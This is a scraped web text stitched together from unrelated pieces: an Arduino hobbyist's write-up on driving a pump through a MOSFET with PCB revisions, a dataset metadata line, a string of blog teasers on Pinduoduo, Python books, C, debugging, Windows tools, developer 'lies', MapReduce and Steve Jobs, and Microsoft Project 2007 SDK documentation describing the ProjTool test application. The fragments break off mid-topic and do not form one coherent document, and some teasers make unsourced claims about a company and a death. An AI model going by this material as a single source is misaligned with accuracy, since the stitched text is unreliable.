#include <Arduino.h> // Sensor and Indicator Led Pins #define LED 0 #define PUMP 1 // Variables for the pressure sensor int _delay = 1000; void setup() { pinMode(LED, OUTPUT); pinMode(PUMP, OUTPUT); digitalWrite(PUMP, LOW); // // set clock divider to /1 // CLKPR = (1 << CLKPCE); CLKPR = (0 << CLKPS3) | (0 << CLKPS2) | (0 << CLKPS1) | (0 << CLKPS0); } void loop() { digitalWrite(PUMP, LOW); digitalWrite(LED, HIGH); delay(_delay); digitalWrite(LED, LOW); delay(_delay); }
This working, I moved onto checking how the the MOSFET runs at 3.3V through and see if it gets any hot with the Pump in the loop, but no connection to the Raspberry Pi I2C:
void loop() { digitalWrite(PUMP, HIGH); digitalWrite(LED, HIGH); delay(_delay); digitalWrite(LED, LOW); delay(_delay); }
This makes the MOSFET to have 3Ω resistance, which might be OK for it to disipate the heat.
Then, using a power supply from the lab I tried to turn ON and OFF the pump during 10s, with a hardcoded delay:
digitalWrite(LED, HIGH); digitalWrite(PUMP, HIGH); delay(_delay); digitalWrite(LED, LOW); digitalWrite(PUMP, LOW); delay(_delay);
And then… some mistakes!
Mistake #1
I connected wrongly the barrel connector. In my power supply, the inner pin (pin 1 below) is the +VDC and the outer part of the barrel is the -VDC. The barrel has three components though:
From this link: The pin 3 serves as a detector for when you insert the plug. When this happens the connection between pins 3 and 2 breaks. This is useful for cutting a battery out of the circuit when a DC adapter is plugged in. In this way, the battery is protected from two unwanted actions: discharging, and being charged. Also, this can be used for building a circuit which detects the insertion of the DC plug. For instance, when the 3-2 connection breaks, some microcontroller I/O pin could be pulled up to VCC, and then the firmware knows that the device is on an adapter.
Therefore, the connection to ground should be done also on the Pin 2, instead on pin 3, or on both, since I have no intention to detect the conection of the barrell connector:
On the first version of this board (see below for more details)
Mistake #2
When I mounted the PCB onto the pump, and turned it on, it began to work erractically.
I run some tests on the board and initially I thought it could be that the MOSFET was inducing some sort of current to the microcontroller through the GATE. For that, I tried to add a resistor in the line:
But this sadly didn’t solve the problem. Then, I was recommended by Esteban to remove the board from the top of the pump since it could be provoking some magnetic interference, or maybe the vibrations from the pump itself:
And it worked! I have done this video to show how the pump works:
I tried to reenact the problem by moving the board back on top of the pump, but I didn’t succeed. The pump’s magnetic field apparently is not a problem on its own, but maybe it is more the vibrations of the pump and probably some bad soldering I have done.
I have done a more robust version for this board below, with the following changes:
- Add an LED in the GATE line (bad idea)
- Add a GND copper zone around the circuit
- Wider traces (0.6mm for the power and 0.3mm for the microcontroller)
The V2.0 is below, but for now, you can see the Frankestein board it resulted from the test:
And a final note! The MOSFET opens at 3.3V without any problem, and it does not get warm at all! even if the resistance goes up to 2Ω when operated like that.
Corrections and V2.0
The new board, with the corrections from above, working at either 3.3V or 5V to trigger the MOSFET gate:
And the new PCB routing, with a copper zone layer for the GND in which I could try to reduce the magnetic fields:
Here I detail the Copper Zone Properties in KiCad. I followed this tutorial for this purpose:
Then, here are the new PNGs for the TRACES:
The inner cuts (almost the same):
The outer cuts:
And the final board after milling!
Mistake (again…)
And of course, yet another mistake: apparently the LED drops down the voltage of the gate to a level that it’s not able to turn ON the MOSFET when powering the circuit at 3.3V. The only purpose for this item was to have a nice glowing when run at different PWMs in the MOSFET, but I had to remove it for simplicity. I replaced it with a 560Ω resistor and the 2,2kΩ by a jumper. | http://fab.academany.org/2018/labs/barcelona/students/oscar-gonzalezfernandez/2018/04/18/Week-11-Output-Devices.html | CC-MAIN-2021-43 | refinedweb | 2,290 | 60.89 |
spiff Wrote:that being said, you can probably have your property, i'll have to check that we have a dedicated localized string for it.
Hitcher Wrote:Thanks, all good here
def getFeelsLike( T=10, V=25 ): """ The formula to calculate the equivalent temperature related to the wind chill is: T(REF) = 13.12 + 0.6215 * T - 11.37 * V**0.16 + 0.3965 * T * V**0.16 Or: T(REF): is the equivalent temperature in degrees Celsius V: is the wind speed in km/h measured at 10m height T: is the temperature of the air in degrees Celsius source: """ FeelsLike = T #Wind speeds of 4 mph or less, the wind chill temperature is the same as the actual air temperature. if round( ( V + .0 ) / 1.609344 ) > 4: FeelsLike = ( 13.12 + ( 0.6215 * T ) - ( 11.37 * V**0.16 ) + ( 0.3965 * T * V**0.16 ) ) # return str( round( FeelsLike ) )# test FeelsLike and check table in site = -10for windspeed in range( 101 ): FeelsLike = getFeelsLike( tCelsius, windspeed ) print FeelsLikeprint "-"*100
import mathdef getDewPoint( Tc=0, RH=93, minRH=( 0, 0.075 )[ 0 ] ): """ Dewpoint from relative humidity and temperature If you know the relative humidity and the air temperature, and want to calculate the dewpoint, the formulas are as follows. """ #First, if your air temperature is in degrees Fahrenheit, then you must convert it to degrees Celsius by using the Fahrenheit to Celsius formula. # Tc = 5.0 / 9.0 * ( Tf - 32.0 ) #The next step is to obtain the saturation vapor pressure(Es) using this formula as before when air temperature is known. Es = 6.11 * 10.0**( 7.5 * Tc / ( 237.7 + Tc ) ) #The next step is to use the saturation vapor pressure and the relative humidity to compute the actual vapor pressure(E) of the air. This can be done with the following formula. #RH=relative humidity of air expressed as a percent. or except minimum(.075) humidity to abort error with math.log. RH = RH or minRH #0.075 E = ( RH * Es ) / 100 #Note: math.log( ) means to take the natural log of the variable in the parentheses #Now you are ready to use the following formula to obtain the dewpoint temperature. try: DewPoint = ( -430.22 + 237.7 * math.log( E ) ) / ( -math.log( E ) + 19.08 ) except ValueError: #math domain error, because RH = 0% #return "N/A" DewPoint = 0 #minRH #Note: Due to the rounding of decimal places, your answer may be slightly different from the above answer, but it should be within two degrees. return str( int( DewPoint ) )# Check Dew Point Calculator with = 10for humidity in range( 101 ): DewPoint = getDewPoint( tCelsius, humidity ) print DewPointprint "-"*100
odoll Wrote:hm, not here - maybe blind, but I just dl'ed the latest win32 nightly build XBMCSetup-20111116-57ba0cb-master.exe
Weather is gone from the main menu, however going to System -> Weather OR System Add-Ons there's non "Weather add-on" to pick?!
Searching Add-Ons for Weather just returns "MEdia sources - DMI TV Vejrudsigt".
Hitcher Wrote:You may need to Force Refresh XBMCs repository for it to show up.
bcamp929 Wrote:No Fahrenheit? | http://forum.xbmc.org/showthread.php?tid=114637&pid=937146 | CC-MAIN-2014-35 | refinedweb | 514 | 65.52 |
icetGetColorBuffer,icetGetDepthBuffer-- retrieves the last computed color or depth buffer.
#include <GL/ice-t.h> GLubyte *icetGetColorBuffer ( void ); GLuint *icetGetDepthBuffer ( void );
Returns a buffer containing the result of the image composition performed by the last call to icetDrawFrame. Be aware that a color or depth buffer may not have been computed with the last call to icetDrawFrame. IceT avoids the computation and network transfers for any unnecessary buffers unless specifically requested otherwise with the flags given to the icetInputOutputBuffers function. Use a call to icetGetBooleanvwith a value of ICET_COLOR_BUFFER_VALID or ICET_DEPTH_BUFFER_VALID to determine whether either of these buffers are available. Attempting to get a nonexistent buffer will result with a warning being emitted and NULL returned.
icetGetColorBufferreturns the color buffer for the displayed tile. Each pixel value can be assumed to be four consecutive bytes in the buffer. The pixels are also always aligned on 4-byte boundaries. The format of the color buffer is defined by the state parameter ICET_COLOR_FORMAT, which is typically either GL_RGBA, GL_BGRA, or GL_BGRA_EXT. icetGetDepthBufferreturns the depth buffer for the displayed tile. Depth values are stored as 32-bit integers. The width and the height of the buffer are determined by the width and the height of the displayed tile at the time icetDrawFrame was called. If the tile layout is changed since the last call to icetDrawFrame, the dimensions of the buffer returned may not agree with the dimensions stored in the current IceT state. The memory returned by icetGetColorBufferand icetGetDepthBufferneed not, and should not, be freed. It will be reclaimed in the next call to icetDrawFrame. Expect the data returned to be obliterated on the next call to icetDrawFrame.
None.
ICET_INVALID_VALUE The appropriate buffer is not available, either because it was not computed or it has been obliterated by a subsequent IceT computation.
The returned image may have a value of $(R, G, B, A) = (0, 0, 0, 0)$ for a pixel instead of the true background color. This can usually be corrected by replacing all pixels with an alpha value of 0 with the background color. The buffers are stored in a shared memory pool attached to a particular context. As such, the buffers are not copied with the state. Also, because they are shared, it is conceivable that the buffers will be reclaimed before the next call to icetDrawFrame. If this should happen, the ICET_COLOR_BUFFER_VALID and ICET_DEPTH_BUFFER_VALID state variables will be set accordingly.Frame(3), icetInputOutputBuffers(3), icetGet(3) IceT Reference February 14, 2008 icetGetColorBuffer(3) | http://huge-man-linux.net/man3/icetGetColorBuffer.html | CC-MAIN-2017-30 | refinedweb | 415 | 55.03 |
What is this
A tool to help the conversion from UnityScript -> C#
You can read more about in this blog post.
How to use
First, download the tool from here.
Before running the conversion tool:
Backup your project
Keep in mind that you'll have best results (i.e, a smoother conversion process) if your UnityScripts have #pragma strict applied to them.
Launch Unity editor (preferably, 5.6x) and make sure you allow APIUpdater to run and update any obsolete API usages. This is necessary to avoid compilation errors during the conversion.
Next step is to run the application (UnityScript2CSharp.exe) passing the path to the project (-p) the Unity root installation folder (-u) and any additional assembly references (-r) used by the UnityScript scripts. Bellow you can find a list of valid command line arguments and their meaning:
Example:
UnityScript2CSharp.exe -p m:\Work\Repo\4-0_AngryBots -u M:\Work\Repo\unity\build -r "m:\AngryBot Assemblies\Assembly-CSharp.dll" "m:\AngryBot Assemblies\Assembly-UnityScript.dll" -s UNITY_ANDROID,UNITY_EDITOR
Limitations
Some comments may not be preserved or be misplaced.
Guarded code (#if … )
- UnityScript parser simply ignores guarded code when the condition evaluates to false leaving no traces of the original code when we are visiting the generated AST. The alternative for now is to run the tool multiple times in order to make sure all guarded code will eventually be processed. Each time the tool is executed user is required to merge the generated code manually.
Formatting is not preserved
UnityScript.Lang.Array (a.k.a Array) methods are not fully supported. We convert such type to object[] (this means that if your scripts relies on such methods you'll need to replace the variable declarations / instantiation with some other type (like List, Stack, etc) and fix the code.
Type inference in anonymous function declarations are inaccurate in some scenarios and may infer the wrong parameter / return type.
Local variable scope sometimes gets messed up due to the way UnityScript scope works.
Types with hyphens in the name (like This-Is-Invalid) are converted as as-it-is but they are not valid in C#
Missing return values are not inject automatically (i.e, on a non void method, a return; statement will cause a compilation error in the converted code)
Automatic conversion from object to int/long/float/bool etc is not supported (limited support for int -> bool conversion in conditional expressions is in place though).
for( init; condition; increment) is converted to while
Methods with same name as the declaring class (invalid in C#) are converted as-it-is
Invalid operands to as operators (which always yield null in US) are considered errors by the C# compiler.
Equality comparison against null used as statement expressions generate errors in C# (eg: foo == null;) (this code in meaningless, but harmless in US)
Code that changes foreach loop variable (which is not allowed in C#) are converted as-is, which means the resulting code will not compile cleanly.
Not supported features
- Property / Event definition
- Macros
Literals
- Regular expressions
Exception handling
Note that any unsupported language construct (a.k.a, AST node type), will inject a comment in the converted source including the piece of code that is not supported and related source/line information.
How to build
In case you want to build the tool locally, "all" you need to do is:
- Clone the repository
- In a console, change directory to the cloned repo folder
- Restore nuget packages (you can download nuget here) -- run nuget.exe restore
- Build using msbuild -- msbuild UnityScript2CSharp.sln /target:clean,build
How to run tests
All tests (in UnityScript2CSharp.Tests.csproj project) can be run with NUnit runner (recommended to use latest version).
Windows
If you have Unity installed most likely you don't need any extra step; in case the tests fail to find Unity installation you can follow steps similar to the ones required for OSX/Linux
OSX / Linux
The easiest way to get the tests running is by setting the environment variable UNITY_INSTALL_FOLDER to point to the Unity installation folder and launch Unit rest runner.
Q: During conversion, the following error is shown in the console:
"Conversion aborted due to compilation errors:"
And then some compiler errors complaining about types not being valid.
A: You are missing some assembly reference; if the type in question is define in the project scripts it is most likely Assembly-CSharp.dll or Assembly-UnityScript.dll (just run the conversion tool again passing -r path_to_assembly_csharp path_to_assembly_unityscript as an argument.
Q: Some of my UnityScript code is not included in the converted CSharp
A: Most likely this is code guarded by SYMBOLS. Look for #if / #else directives in the original UnityScript and run the conversion tool passing the right symbols. Note that in some cases one or more symbols may introduce mutually exclusive source snippets which means that no matter if you specify the symbol or not, necessarily some region of the code will be excluded, as in the example:
#if !SYMBOL_1 // Snippet 1 #endif #if SYMBOL_1 // Snippet 2 #endif
In the example above, if you run the conversion tool specifying the symbol SYMBOL_1 , Snippet 1 will be skipped (because it is guarded by a !SYMBOL_1) and Snippet 2 will be included. If you don't, Snippet 1 will be included but Snippet 2 will not (because SYMBOL_1 is not defined).
The best way to workaround this limitation is to set-up a local VCS repository (git, mercurial or any other of your option) and run the conversion tool with a set of symbols then commit the generated code, revert the changes to the UnityScript scripts (i.e, restore the original scripts), run the conversion tool again with a different set of Symbols and merge the new version of the converted scripts.
Q: The conversion fails with exceptions about failures to find Unity types
A: During the development process we observed some errors like that when refereincing assemblies from Unity 2017.1/2017.2.
Please, try to reference Unity assemblies from Unity 5.6.x (i.e, pass the path to Untiy 5.6 instalation as the command line argument **-u**). | http://unitylist.com/r/ctt/unity-script-2csharp | CC-MAIN-2017-51 | refinedweb | 1,024 | 51.18 |
Variables in C++
Variables are the name to memory space in the computer where we can store data of certain types. They are important component of any programming language. In C++, each variable has its type which defines the type of value that can be stored by the variable, size taken by that variable and its range. Some basic types of variables in C++ are int, float, bool, char, etc.
- Variable Declaration in C++
- Rules for Naming Variable
- Data types of Variables
- Pointer Variables
- Reference Variables
- Scope of a Variable
Variable Declaration in C++
In C++, variables must be declared before using it. Declaring a variable tells the compiler that a variable of certain type is being used in the program. Using a variable before declaring it will cause an error. Variables can be declared in C++ as follows
datatype variable_name; For e.g. int x;
Similarly, values can be assigned to variables as follows:
variable_name = value; For e.g. x = 9;
The declaration and assignment statement can be combined into a single statement as follows:
datatype variable_name = value; For e.g. int x = 9;
Any number of variables can be declared in a single statement also as follows:
datatype var1, var2, ... ,varN; For e.g. char x, y, z, ... , m;
Rules for Naming Variable
- Variable name can't be a C++ keyword. For e.g. int can't be a variable name as it is a C++ keyword.
- Variable name must start with an alphabet (A-Z and a-z) or underscore ( _ ) sign. For e.g. var, X, _name, etc are valid variable names but 1a, $age, etc are invalid variable name.
- Variable names can have alphabet (A-Z and a-z), underscore ( _ ), digits (0-9) but can't have other symbols such as %, &, @ , etc. For e.g. a_01, findSum are valid variables name but name&, calc% are not allowed in C++.
- The name of variable can be of any length but only first 31 characters are significant.
Some valid variable names are: db_password, _age, calcPercent, x, etc.
Some invalid variable names are: 1user, %1age, v@lue, !!, *name*, etc.
Data types of variables
Data types defines what type of data a variable can store. In C++, data type of a variable should be defined during declaration. The declaration statement informs the compiler about the type of data the variable can hold and memory required to store it. The basic data types available in C++ are
- bool: It holds boolean value i.e. true(1) or false(0).
- char: It holds character such as alphabet, digits, special characters.
- wchar_t: It can hold 16 bit wide characters and are used to represent languages that have more than 255 characters. Example, Japanese.
- int: It holds integer values such as 5, -100, 359, etc.
- float: It holds floating point numbers such as 101.56, 200.00, -4.589, etc
- double: It also holds floating point numbers but have more precision than float.
Modifiers such as signed, unsigned, long and short can be used before int and char data types to modify them according to our need. For example, if we are writing program to check if a number is prime or not, we can declare the number as unsigned int since prime numbers are always positive integer.
The following table shows the size and range of basic data types used in C++.
Range of a data type = 0 to 2n-1 (for signed) and 2n-1 to 2n-1-1 (for unsigned and with no prefix).
Note: The size of data type can be known by using sizeof() operator as sizeof(float). Some modern compilers such as CodeBlocks shows the size of integer as 4 bytes. However according to ANSI C++ standard its size is 2 bytes only.
Pointer variables
Normal C++ variables stores data and occupy certain memory in the computer. Pointer is a variable that store the address of other variable of same type i.e. a integer pointer will store the address of integer variable. Pointer can be declared using '*' sign as,
datatype * ptr; For e.g. float *fptr;
Assigning address to pointer variables
ptr = &variable_name; For e.g. int x = 5; int *p = &x; // address of x value of p
Reference variables
A reference variable is an alternative name for a previously defined variable. A reference variable must be initialized at the time of declaration. For example, if a is made reference of b, then a and b can be used interchangeably to represent that variable.
Syntax for creating reference variable
datatype &reference_variable = variable_name;
For example,
int xyz = 10; int & abc = xyz;
Here abc is a reference variable for xyz. abc can be used as alternative for xyz. Both refer to the same data in memory. If value of one variable is changed, value of another variable is also changed.
For example,
abc = 5;
This statement will change the value of both abc and xyz to 5.
Scope of a Variable
Scope is a certain module of a program such as function, class or namespace. A scope of a variable is a region in which it is visible and can be accessed. Based on the scope of variable, a variable is of two types:
- Local variables
- Global variables
1. Local variables
Variables that are declared inside a module and can only be used within the module are called local variables. They can't be used outside the block in which they are declared.
Example 1: C++ program to create and use local variable
#include<iostream> #include<conio.h> using namespace std; int main() { int a,b; // local variables a=5; b=6; cout<<"a*b = "<<a*b; getch(); return 0; }
Output
a*b = 30
2. Global variables
Variables that are declared outside all modules and can be accessed and assigned by all the functions in the program are called global variables. The life time of a global variable is same as the life time of the program where it is declared.
Example 2: C++ program to create and use global variable
#include<iostream> #include<conio.h> using namespace std; int g; // global variable void test() { cout<<"Inside test"<<endl; cout<<"g = "<<g<<endl; } int main() { g=25; cout<<"Inside main"<<endl; cout<<"g = "<<g<<endl; test(); getch(); return 0; }
Output
Inside main g = 25 Inside test g = 25 | https://www.programtopia.net/cplusplus/docs/variables | CC-MAIN-2019-30 | refinedweb | 1,051 | 72.36 |
Contents
Plugin Development Guide
This page documents some best practices and guidelines for plugin development. It is a community driven document, and everyone is encouraged to contribute to it. If you have questions or comments, please raise them on the Trac-dev MailingList.
Licensing
Plugin authors are encouraged to clearly indicate how the contribution is licensed. This is important for both users and future developers of your plugin, because if you choose to no longer support the plugin, the terms under which someone else can adopt and develop it are clear. minimise restrictions on future use of the code. Trac has adopted the BSD 3-Clause license, and use of the same license in any plugin code is encouraged. One of the many benefits to adopting this license is that any plugin code can be integrated into the Trac core.
The following steps are suggested to add a license:
- Add the
licensekeyword in
setup.py(example).
- Add a license header to every Python source file (example).Note: For an executable file such as
# -*- coding: utf-8 -*- # # Copyright (C) YYYY-YYYY your name here <your email here> # All rights reserved. # # This software is licensed as described in the file COPYING, which # you should have received as part of this distribution.
setup.py, the header will follow the line
#!/usr/bin/env python(example).
- Add a license header to every RSS and XHTML Genshi template (example: todo).The use of the XML comment marker as shown is important, so that the text does not get rendered to the output. Make sure not to use the alternate form, which is rendered to the output as a hidden comment:
<!--! Copyright (C) YYYY-YYYY your name here <your email here> All rights reserved. This software is licensed as described in the file COPYING, which you should have received as part of this distribution. -->
<!-- This is also a comment -->
- Add a
COPYINGfile with the license text in the top-level directory of the project (example).
- Add an appropriate tag to the wiki page:
Additional tags can be created for additional or more descriptive license types.
Currently it is not recommended to add license text to static resources (ie plugin is a single
.py file that is placed in the project or shared
plugins directory. While the metadata for a packaged plugin is stored in its
setup.py file, the metadata for a single-file plugin can be added using file-scope attributes. The supported attributes and their aliases are:
author,
author_email,
url),
license,
trac and
version (
revision):
version = "$Rev$" home_page = "" license = "3-Clause BSD" author = "Joe Bloggs" author_email = "trac@python.org"
The attributes should be self-explanatory with the possible exception of the
trac attribute. The
trac attribute is used to direct bug reports to an issue tracker that differs from
home_page. If the plugin is hosted on trac-hacks.org and the
home_page attribute is set to point to the project wiki page, the
trac attribute will not need to be set.
For files stored in Subversion, Keyword Substitution is supported for the
version (
revision) attribute.
version = '$Rev$'
The file's
svn:keywords property must be edited to append
Rev. Note that the aliases
Revision,
LastChangedRevision and
HeadURL are not supported by Trac.
svn propedit svn:keywords MyAmazingMacro.py
Coding Style
Authors are encouraged to conform to the Trac Style Guide and PEP-0008 style guide.
Assert Minimum Trac Version Requirement
A common method of specifying a minimum required Trac version is to add an installation requirement in
setup.py, for example:
install_requires = ['Trac >= 0.12']. However, this causes numerous problems, some of which are documented in #9800, and is not recommended. One of the most negative consequences is that setuptools may download and install a newer version of Trac during installation of a plugin. The result can be an unintended upgrade of a user's installation (#10607).
A better approach is to place the following in the package
__init__.py, modifying
min_trac_version as appropriate for your plugin:
import pkg_resources pkg_resources.require('Trac >= 1.0')
You should still specify that Trac is an installation requirement, but without enforcing a version requirement:
install_requires = ['Trac'].
The check in
__init__.py is'))")
Documenting required and optional components
The docstring for a Component class is displayed as the Component description on the plugin admin panel.
It is recommended that the description be prefixed with
[required] or
[optional], to guide end-users in enabling the proper Components. The
[extra] descriptor can also be used for features that have specialized or narrow use-cases.
If your plugin ships with other code, such as jQuery or a Python library, then mention this in your plugin description.
Publishing Packages to PyPI
There are no strict rules on how you should publish your packages to PyPI, but for those unfamiliar with the process we present some recommendations. Most Trac plugins contain only Python code and static assets, and therefore packages can be published in a platform and Python-version independent wheel format. It is also recommended that you publish your package in the
sdist (tarball) format. There is also a list of all Trac plugins that have been published to PyPI.
- Register yourself an account on PyPI.
- Install twine and add your credentials to
.pypircin your home directory. Example:
[distutils] index-servers = pypi pypi-test [pypi] repository = username = myusername password = mypassword [pypi-test] repository = username = myusername password = mypassword
- Name your package appropriately. The package name is specified with the
nameargument in
setup.py. It is recommended that you prefix your package name with
Trac, for easy identification and to reduce the likelihood of a package name collision with an existing PyPI package. For example, FullBlogPlugin is given the name
TracFullBlog, and TagsPlugin is given the name
TracTags.
- Update dependencies in your environment:
$ pip install -U pip setuptools wheel
- From a checkout of your source code, run:
$ python setup.py sdist bdist_wheel
- Register your package on PyPI.
$ twine register dist/*.whl
- Publish your packages.
$ pip install -U twine $ twine upload dist/*.whl dist/*.tar.gz
Some thing to be aware of:
- Once a package is published to PyPI the package cannot be republished without changing the package version. You can simply bump the version or add a post release number.
- You may wish to first publish to
pypi-test, particularly if you aren't familiar with the process. Once you establish that the package can be installed from pypi-test, you can publish to pypi. Note that you have to register separately for pypi-test, and specify the server name in
twinecommands.
$ twine upload dist/*.whl dist/*.tar.gz pypi-test
- Once you take ownership of a package name on PyPI there is no process for transferring ownership of the package that can happen independent of you (see PEP:0541). This is a frequent cause of abandoned packages on PyPI, where the original owner is not reachable and a new maintainer of the package cannot update the published package. For that reason, please consider giving ownership of the package to other users in case you someday decide to no longer maintain the package. For example, you could give ownership to the TracHacks admins.
Further reading: | https://trac-hacks.org/wiki/DevGuide | CC-MAIN-2018-05 | refinedweb | 1,190 | 55.74 |
color-marked
markdown parser with highlight and inline code style support, useful for writing email with markdown
npm install color-marked
marked
Markdown parser with code hightlight form highlight.js and optional inline color support. It could be useful when you want to colorful your code in your email.
Options
See orignal README to get understand of most options.
Addtional options include
color and
colorscheme
colorparse the css file and add inline color for the code element.
colorschemewhich colorscheme to use, see highlight.js demo to get all the colorschemes and supported languages.
The value of
langPrefixwas changed to
language-
Browser support
import css file is required to display colors.
When used in browser, import highlight.js file before marked.js file and make sure function
window.hljsis availabel for converting.
Use function
marked(src, option)for markdown converting.
Component support
Install by using component command.
Syntax highlight is enable by default, default colorscheme is
solarized_light.
component install chemzqm/marked
Usage Example:
var marked = require('marked'); console.log(marked('**This** is marked for [component]()'));
Javascript API usage
// Set default options marked.setOptions({ gfm: true, tables: true, breaks: false, pedantic: false, sanitize: true, smartLists: true, smartypants: false, langPrefix: 'language-', highlight: function(code, lang) { if (lang === 'js') { return highlighter.javascript(code); } return code; } }); console.log(marked('i am using __markdown__.'));
You also have direct access to the lexer and parser if you so desire.
var tokens = marked.lexer(text, options); console.log(marked.parser(tokens));
var lexer = new marked.Lexer(options); var tokens = lexer.lex(text); console.log(tokens); console.log(lexer.rules);
$ node > require('marked').lexer('> i am using marked.') [ { type: 'blockquote_start' }, { type: 'paragraph', text: 'i am using marked.' }, { type: 'blockquote_end' }, links: {} ]
Running Tests & Contributing
If you want to submit a pull request, make sure your changes pass the test suite. If you're adding a new feature, be sure to add your own test.
The marked test suite is set up slightly strangely:
test/new is for all tests
that are not part of the original markdown.pl test suite (this is where your
test should go if you make one).
test/original is only for the original
markdown.pl tests.
test/tests houses both types of tests after they have been
combined and moved/generated by running
node test --fix or
marked --test
--fix.
In other words, if you have a test to add, add it to
test/new/ and then
regenerate the tests with
node test --fix. Commit the result. If your test
uses a certain feature, for example, maybe it assumes GFM is not enabled, you
can add
.nogfm to the filename. So,
my-test.text becomes
my-test.nogfm.text. You can do this with any marked option. Say you want
line breaks and smartypants enabled, your filename should be:
my-test.breaks.smartypants.text.
To run the tests:
cd marked/ node test
Contribution and License Agreement
If you contribute code to marked, you are implicitly allowing your code to be
distributed under the MIT license. You are also implicitly verifying that all
code is your original work.
</legalese>
License
MIT | https://www.npmjs.org/package/color-marked | CC-MAIN-2014-10 | refinedweb | 515 | 60.82 |
Mashing code from a few different sources I am trying to make a python chat client. I can connect to the server but I want to use two threads so I can send and recieve messages at the same time. I am new to python and cannot get my threads to work. My python version is 2.7.5
#!/usr/bin/python
import sys
import socket
import time
import threading
# Define a function for the thread
def sendChat( socket, name):
userInput = ""
while userInput != "exit":
userInput = raw_input("What do you want to say")
userInput = (userInput+'\r\n')
socket.send(userInput)
socket.close
print "Hello, Python!"
userName = raw_input("What would you like your user name to be:")
print (userName + " welcome to chatclient, connecting to server now...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
host = socket.gethostname() # Get local machine name
port = 4444
s.connect((host, port))
print "... connected to server!"
try:
thread.start_new_thread( sendChat, (s, "sendChat" ) )
except:
print "Error: unable to start thread"
time.sleep(100)
Ryans-MacBook-Pro:network ryan$ python chatclient.py
Hello, Python!
What would you like your user name to be:ryan
ryan welcome to chatclient, connecting to server now...
... connected to server!
Error: unable to start thread
Well, with the code exactly as given, your catch-all
try/except is hiding the obvious cause. If I remove the
try/except, I get:
Traceback (most recent call last): File "ga.py", line 26, in <module> thread.start_new_thread( sendChat, (s, "sendChat" ) ) NameError: name 'thread' is not defined
Obvious, yes? You didn't import the
thread module, so of course calling
thread.start_new_thread() can't possibly work (you imported
threading instead - which you should be using instead of the low-level
thread module). | https://codedump.io/share/8lv1bglCY3ir/1/python-thread-not-starting | CC-MAIN-2018-09 | refinedweb | 284 | 68.97 |
$…
Pinduoduo is a new prominent social e-commerce company in China.
On July 26, 2018, this three-year-old company listed on NASDAQ. Pinduoduo has achieved tremendous success in business over the past few years and is currently worth $197B. It earns a lot of money.
At the same time, it is the most evil IT company in China. The working environment of Pinduoduo seems like a sweatshop. They give extra money to buy employees’ dignity and life, and they don’t hesitate to damage others for their own interest.
On December 29, 2020, at 1 a.m., a 23-year-old female employee of Pinduoduo finally…
Python is a language I like very much, and it is also hot right now. In this post, I will list some Python books for beginners and experienced programmers who are interested in Python.
Let’s start from beginner to expert levels.
With Python and Java being so hot in the IT industry these days, if you’re still in school or you have ambitions for programming, I’d recommend settling down to learn C.
If you haven’t know anything about C, learning some of the basics will suffice. Try to figure out what people complain about it and the simplicity of the design and abstraction.
You’ll benefit from it for the rest of your computing life, and the knowledge will help you much in your programming career!
C language is one of the oldest programming languages and it has gone through almost half…
Debugging is a fundamental skill for programmers, it’s a craft and we need to practice to be better at it. Here, I summarized the useful tricks and tools for debugging your Python code.
Know the details of implementation is critical in debugging. When you are debugging a Python code, you may want to know the source code of a module, class, method, function, traceback, frame, or code object. The inspect module will help you:
import inspect
def add(x, y):
return x + yclass Dog:
kind = 'dog' # class variable shared by all instances
def __init__(self, name):
self.name …
Microsoft has made great efforts to improve the user experience and build an active ecosystem for developers. Moreover, Microsoft has completely embraced open source in recent years. There are so many awesome open source projects developed by Microsoft.
After eight years of daily work on a Mac, I recently switched to Windows 10. My previous impression was that Windows was not developer-friendly and efficient compared to Mac.
But I don’t miss my Mac and may get some shiny development experience on Windows 10. Within two weeks of exploration, I found the following five tools that can greatly improve my productivity.
After nearly 10 years of programming, I found some interesting and common lies told by developers. We unconsciously tell these lies to others or even to ourselves.
If you are a manager, product owner, girlfriend, or any other role who will cooperate with a developer, keep an eye!
TODO seems vital for some development processes.
Simply, TODO means something important but not urgent will be completed some days later, such as adding comments for code, handling exceptions, refactoring, etc.
Sadly, in most cases, TODO means we won’t do it forever.
The Linux codebase currently has over 4k TODO comments, many…
MapReduce is a computing model for processing big data with a parallel, distributed algorithm on a cluster.
It was invented by Google and has been largely used in the industry since 2004. Many applications are based on
MapReduce, such as distributed pattern-based searching, distributed sorting, web index system, etc.
MapReduce is inspired by the
map and
reduce functions, which are commonly used in functional programming.
Map and
Reduce are not new programming terms. They are operators that come from Lisp, which was invented in 1956.
Let’s begin with these operators in a programming language and then move on to
MapReduce…
Steve Jobs left the world for almost ten years. Recently, I watched a short Youtube video which reminded me of the wisdom assets from Steve.
If you haven’t watched it, here it is.
At the 1997 WWDC Apple Developer Conference, a programmer publicly humiliated Steve Jobs for not knowing some fancy technologies.
The question from this developer is:
I would like, for example for you to express in clear terms, how Java in any of its incarnations addresses the ideas embodied in OpenDoc. …. Write stuff about programming languages, algorithms, and architecture. | https://medium.com/@coderscat | CC-MAIN-2021-10 | refinedweb | 749 | 63.49 |
The ProjTool test application source code in the Microsoft Office Project 2007 SDK download includes examples that use the Project, Resource, LookupTable, CustomFields, QueueSystem, Archive, Events, Security, and Admin Web services of the Project Server Interface (PSI). ProjTool is useful for creating data in a test installation of Microsoft Office Project Server 2007 and for examining how the PSI methods work. (The ProjTool source code was contributed by Robert Kennedy Murugan, Microsoft Corporation.)
The ProjTool source code and solution files for Microsoft Visual Studio 2005 is included in the Project 2007 SDK download. The source code language is Microsoft Visual C#. This article describes how to compile the ProjTool application and use the application's main features. This article does not explain most of the ProjTool code or how to use the PSI and datasets. For a link to the Project 2007 SDK download, see Welcome to the Microsoft Office Project 2007 SDK. For more information about using the PSI, see Working with the PSI and DataSets.
The ProjTool application is designed to be used only on a test installation of Project Server. ProjTool is not supported for use on a production server. ProjTool can easily delete or change data in the Draft and Published databases, as well as reset the Project Server Queuing Service, Project Server Eventing Service, and Internet Information Services (IIS), and restart Microsoft SQL Server.
The main purpose of ProjTool is to provide developers with a way to quickly populate the Project Server databases with data in a test installation so that they can more easily develop other applications. You can see how to use some of the PSI and DataSet methods that are at the heart of Project Server development. You can also learn about program flow and the state of variables and datasets by setting breakpoints in the source code while running the application. ProjTool does not use all of the PSI Web services or all of the methods in any one Web service, but it does provide a base for a fairly comprehensive test application.
This article includes the following sections:
Compiling ProjTool
Basic Operation of ProjTool
Saving Settings for Forms Authentication and Impersonation
Using the ProjTool Main Window
Creating Projects
Modifying Project Data
LookupTables
Managing Event Handlers
Using Impersonation in ProjTool
